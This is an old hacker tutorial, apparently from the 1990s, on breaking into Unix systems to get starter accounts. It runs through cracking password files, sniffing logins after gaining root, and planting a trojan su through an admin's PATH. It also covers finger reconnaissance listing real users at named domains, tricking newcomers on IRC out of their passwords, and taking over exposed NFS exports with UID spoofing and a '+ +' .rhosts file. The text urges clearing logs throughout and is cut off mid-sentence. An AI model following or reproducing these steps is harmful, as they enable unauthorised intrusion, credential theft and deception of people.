There are many ways to get a starter account. I will go into each area to

help you get started. All you need is one good account to spawn off to

hundreds of accounts. Think of this; You get one good exploitable system,

most any linux machine ;)

Now you get root access and load a sniffer program. The TCP sniffer will

search out any login process on the network and log the login and password

for any telnet, ftp, or dial-in session going out or coming into the system.

Now even if it is a small ethernet connection you have around 100 passwords

for a few machines or domains. If a larger net provider you have hundreds

of accounts all over the world! All you need for this is one good account

and password to an exploitable system. If it seems you can not exploit

root on the system, this might be a good system to crack passwords on and

exchange the accounts for other accounts from hackers or irc users that are

looking to load a bot but do nt have the shell account or disk space to do

it. NEVER give out even one password to a system you exploited root on.

Keep these systems to yourself!

Lets now get into ways to get your first accounts.

If you are hacking with the right frame of mind, you will run the crack

program until you get one good account that will let you into the system.

You will login and see if you can exploit root on the system, if so, get root,

get the files you need to use into your nested directory, and erase your

presence, and clean all of the logs. Now you are ready to load your sniffer.

Why go on hacking passwords for a system that within 24 hours you will have

most of the passwords anyway? Not only for the machine you just hacked, but

other machines that were connected to as well. If the system is not

exploitable don't even waste your time on it, go on to the next. At a latter

date if you want to crack passwords for accounts to trade go ahead.

If you get an admin's account cracked you might want to read his history files,

and see if he is using the su command to access root allot. If he is you can

use an su trojan on him. This will get you the root password. This works like

this: You change his shell script so that a hidden directory (.term) is good,

is set in the search path before all other directories. You put a fake su

binary in the .term (or other) directory. He types su, everything looks good

to him, he types in the root password when prompted, the password id copied to

a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a

password error telling him to try again. He thinks he must have done something

wrong and runs su again, but this time the real one and logs in.

You will find this fake su program in the last appendix named uuencoded files.

Here are the docs:

Fake SU by Nfin8 - i-e

IRC: /msg i-e

Easy as 1,2,3 ...

1. Change the path in one of the user accounts that you have access to that

you see is using SU from reading their history files, to hit a path first

that you have placed the su trojan file into. .term or .elm is good!

2. Make sure to edit the top of the su.c file to the path you will be using

so that the sutrojan will delete isself and let the real SU work for the

second try.

3. Put all of the files in the target directory and compile the su.c file.

gcc su.c -o su

Then delete all of the files but the su. All done!

.bash_profile might look like this:

# .bash_profile

# Get the aliases and functions

if [ -f ~/.bashrc ]; then

. ~/.bashrc

fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

ENV=$HOME/.bashrc

USERNAME=""

export USERNAME ENV PATH

You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin

When the sys admin run's 'SU' it will run the SU-trojan in the .term

directory first and report that the password he typed was wrong, the

Trojan su program would have put a hidden file in the /tmp directory for

you that contains the root password (or account passwd) typed. If it was

an account rather then the root password it will let you know the account

name. Then the trojan su program deletes itself so that the next try will

get the real su program.

You can find the admin's at the top section of the passwd file in the /etc

directory. Just type : more passwd

You can be sure that the first two real accounts made in the passwd file are

admin's, also sometimes you can find others by where their directories are

located in the password file. Like /staff/username.

The history files are in each users account directory. You can read these to

see what the last commands were that were typed by the user. Sometimes as

much as the last 100+ commands. Look for the file .bash_history, or History,

you can read these using more. command: more .bash_history, or most times to

keep your typing you can type : more .b* (or) just type : more .b (and then

hit the tab key on your keyboard).

Ok so now you need a good password cracking program. You can see in the next

chapter on how to get password files from systems that you do not have an

account on, but it is catch 22, you need the password cracking program too.

There are three things that you will need.

1. Password cracking program

2. Good word files

3. Password files

The best password cracking program to start would be crackerjack. You can

search the web and find this easy as 1,2,3. Download it and you are ready

to go. If you are a bit more advanced you can download a cjack for unix and run

it in a shell. But if you are just getting started get the DOS/OS/2 version.

Also search for some good word files. The best word files are the names.

You will find that most unsecured passwords out there are guy's girlfriends

names, of girls boyfriends names ;) You will find word files like

'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'

hackersdict' and other like these to be the best.

Load crackerjack like this:

[D:\jack]jack

Cracker Jack version 1.4 for OS/2 and DOS (386)

Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : domain.com.passwd

Wordfile : domain.com.passwd

Like above run the password file as the wordfile first. This will get you all

of the logon's first that used their login name as their password, also if they

used any other info like their real name or company name it will hit right away

and you will not have to wait for the program to search through a word file.

If you want to hash the word file to get more out of it you can read the doc's

for crackerjack.

Hashing is where you can tell crackerjack to change the case of the wordfile

or even add numbers or letters to the beginning or end of the words in the word

file, like sandy1 or 1sandy. You will find that many users do this and think

they are more secure.

Here are hashing files for both the passwd file and your word list. After

looking these over you will see how you can modify these or create new ones

to suit your needs.

You can get password files without an account, see next chapter.

There are other ways to get an account without doing much work. Park yourself

on an irc channel that you made with a title about hacking. Also try joining

other channels already on the irc. Channels would include:

#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii

#hackers_hideout or any others you can find.

Now what you are looking for are newbe's looking to learn or exploit their shell

they are on already. There is always someone out there that does not know as

much as you. Watch for someone out there that asks a newbe question and gets

no answer or even kicked off the channel. Here is your mark ;)

/msg him so that others can't see that you are talking to him, and begin to ask

him questions, try to help him, but not too much ;) Finally tell him that you

can login for him and do it. This could be to snatch the passwd file or god

knows what. Promise him the world and get that login password. Now you have

a start and can start your on-hands learning process. If you get root on the

system you might not want to expose that to him, but you can feed him other

goodies that will keep him busy while you sniff some other passwords on the

system.

So now if there are some out there that remember i-e when you gave him your

login and password, you can be sure that the above never happened <G>rin ...

I tend to like to help people learn so I am telling the truth when i say I

have dealt honestly with most everyone I have come across.

There is another way you can do this. Be sure that on most big systems

that users do not use secure passwords. from a shell do this:

finger @domainname.com Watch I will do a real domain:

[10:35am][/home/ii]finger @starnet.net

[starnet.net]

Login Name Tty Idle Login Time Office Office Phone

chris Chris Myers p2 4:46 Jan 27 11:19

mike Mike Suter p1 4:57 Jan 22 16:14

mike Mike Suter p5 3d Jan 16 15:35

root System Administrator p3 4:59 Jan 16 10:17

wendt Catherine Wendt-Bern p0 3 Jan 21 14:49

[10:35am][/home/ii]

Now we might want to try logging in later, log this information:

Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...

This one looks good, wendt:Catherine:catherine

Here is another command:

[10:35am][/home/ii]finger -l @starnet.net

[starnet.net]

Login: mike Name: Mike Suter

Directory: /usra/staff/mike Shell: /bin/csh

On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net

On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox

Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk

No Plan.

Login: root Name: System Administrator

Directory: /root Shell: /bin/csh

On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net

Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net

Mail forwarded to:

\[email protected]

#\[email protected], \[email protected]

No Plan.

Login: wendt Name: Catherine Wendt-Bernal

Directory: /usra/staff/wendt Shell: /bin/csh

On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout

No Plan.

You get more info to play with ;)

I know this can make you tired ....

Remember this stuff will log your tries, so if you get on and get root, clean

the logs ;)

Here is a small .c file you can use if you get on.

You could also write a small perl script that will finger @ from a domain

list and cat the response to a file, then when done it will go back and try

to login using pop3d username-username (or other info) and putting the

response into another file for you.

You can ftp to rs.internic.net:

in the domain directory you will find:

com.zone.gz

edu.zone.gz

gov.zone.gz

mil.zone.gz

net.zone.gz

org.zone.gz

download these files and run getdomain.pl (script below) on the domains you

want to target first, in this manor:

"perl getdomain.pl com.zone com >com.all"

What this will do is rip all of the .COM domains and put them into a file

called comm.all.

If you wanted to do all of the .EDU addresses you would type:

perl getdomain.pl edu.zone edu >edu.all

Now you will have a list to use with your probe called edu.all

Here is the perl script

To use the script above all you need to do is copy between the lines above

and name it getdomain.pl, now copy it into the unix os and type

chmod +x getdomain.pl

Now it is ready to run with the command lines above.

This is not hard to do and there are many systems out there that are mountable.

Mount is a command in unix that will allow you to mount remote machines drives

you yours. This is done so you can do installs from other machines, or just

share drives or directories across the network. The problem is that many

admins are good with unix commands or setup. Or maybe they are just plain

lazy and mount the drives with world access not understanding that the world

can mount the drive and gain write access to their users directories.

What you will need to get started here is a hacked root account. To be able to

mount the remote drive and gain access you will need to modify the system's

password file and use the su command.

Ok let's say we have root access. let's get started!

You can see if another system has mountable drives by using the showmount

command.

From root account:

$root> showmount -e wwa.com

mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive

Ok, no problem, this domain will not work, go on to the next one...

$root> showmount -e seva.net

Export list for seva.net:

/var/mail pluto.seva.net

/home/user1 pluto.seva.net

/usr/local pluto.seva.net,rover.seva.net

/export/X11R6.3 rover.seva.net

/export/rover rover.seva.net,pluto.seva.net

/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)

Notice the (everyone), this would be good if we wanted to install linux

from this guy's box, but we want open directories to users.... so go on to

the next one...

$root> showmount -e XXXXX.XXX < this one worked ... find your own ;)

Export list for XXXXX.XXX:

/export/home (everyone)

Now this guy mounted his home directory, the user accounts are off of the home

directory ;) and look above ... (everyone) can access it!

Ok, this section was to show you how to see if they are mountable, in the next

section i will show you how to mount and hack it. But for now, here is a

script that will scan for EVERY DOMAIN on the internet that is mountable and

log them for you.

To use this script simply use the domain ripper in the PHF section and download

the needed files from rs.internic.net rip some domains and name the file

'domains' and startup the script. To make it run in the background put a

& after the command. like this: cmount.pl&

How it works:

When you run the file it will go to the domains list and run showmount -e

on each domain, if it finds that there is a return on mountable drives

it will save the info in the current directory in files named:

domain.XXX.export. All you have to do is view the files and mount the drives!

cmount.pl

Ok, now on to mounting the drives ....

lets say we did a showmount -e domain.com and got back:

Export list for domain.com:

/ (everyone)

/p1 (everyone)

/p2 (everyone)

/p3 (everyone)

/p5 (everyone)

/p6 (everyone)

/p7 (everyone)

/var/spool/mail titan,europa,galifrey

/tmp (everyone)

We would want to mount / .. yup .... this guy has his entire system mountable!

$root> mkdir /tmp/mount

$root> mount -nt nfs domain.com:/ /tmp/mount

If he had the home directory mountable the command would be:

$root> mount -nt nfs domain.com:/home /tmp/mount

To unmount the system, make sure you are out of the directory and type:

$root> umount /tmp/mount

Make sure you make the mount directory first, you can make this anywhere on the

system that you want. If the systems /mnt directory is empty you can use it

also.

Ok this is for real:

bash# ls -al /mnt ; making sure the mnt dir is empty

ls: /mnt: No such file or directory ; there was not even a dir there ;)

bash# mkdir /mnt ; lets make one for them <g>rin

bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...

bash# cd /mnt ; changing to the mounted drive...

bash# ls ; just the plain dir ..

TT_DB home raddb share

back local radius-961029.gz www

exec lost+found radius-961029.ps

bash# ; there is is up there, the home dir ... oh good ...

bash# cd home

bash# ls -l ; long directory listing ... tom is looking good here ;)

total 18

drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry

drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke

drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens

drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg

drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin

drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk

drwxr-xr-x 6 news news 512 Mar 6 1996 news

drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert

drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk

drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom

drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx

drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www

bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file

bash# pico /etc/passwd

tom:x:302:2::/home:/bin/bash ; this should do it ;)

bash# su - tom ; su to the tom account ...

bash$ ls -l

total 18

drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry

drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke

drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens

drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg

drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin

drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk

drwxr-xr-x 6 news news 512 Mar 6 1996 news

drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert

drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk

drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom

drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view

drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www

bash$ ; NOTICE above that toms user number is gone ... we now own his dir!

bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts

bash$ ;inside .rhosts will be wild cards + + for anyone to rlogin to his account

bash$ rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain.

Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx

Sun Microsystems Inc. SunOS 5.5 Generic November 1995

> ; yup we are in!

> ls -al

total 8

drwxr-xr-x 2 tom group 512 Mar 1 17:10 .

drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..

-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile

-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts

>

So now we have access, so lets just hack this system ... oops, that is another